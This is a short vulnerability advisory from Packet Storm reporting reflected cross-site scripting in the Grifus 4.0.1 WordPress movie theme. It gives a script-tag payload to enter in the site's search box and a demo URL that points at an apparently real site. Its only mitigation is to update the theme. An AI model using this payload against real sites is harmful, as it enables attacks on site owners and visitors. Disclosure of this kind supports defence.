WordPress Grifus 4.0.1 Cross Site Scripting

2017-12-21T00:00:00
ID PACKETSTORM:145514
Type packetstorm
Reporter Sajibe Kanti
Modified 2017-12-21T00:00:00

Description

                                        
                                            `======  
Title: Grifus WordPress Themes XSS Vuln  
Version: 4.0.1  
Homepage: https://mundothemes.com/grifus/  
=======  
  
Description  
================  
Grifus WordPress theme For movies Web  
  
POC:  
========  
1. Go To Terget Web  
2. Click Search box  
3. Now Give This Payload in Search box "  
<script>prompt(document.domain)</script>  
"  
4. Now See xss Will be Exclude  
  
Demo:  
======  
http://download.lakshmipuronline.com/?s=%3Cscript%3Eprompt%28document.  
domain%29%3C%2Fscript%3E  
  
Mitigations  
================  
Update Your Themes  
  
  
  
--   
Thanks  
Sajibe Kanti  
Independent Web Security Researcher <https://twitter.com/Sajibekantibd>  
`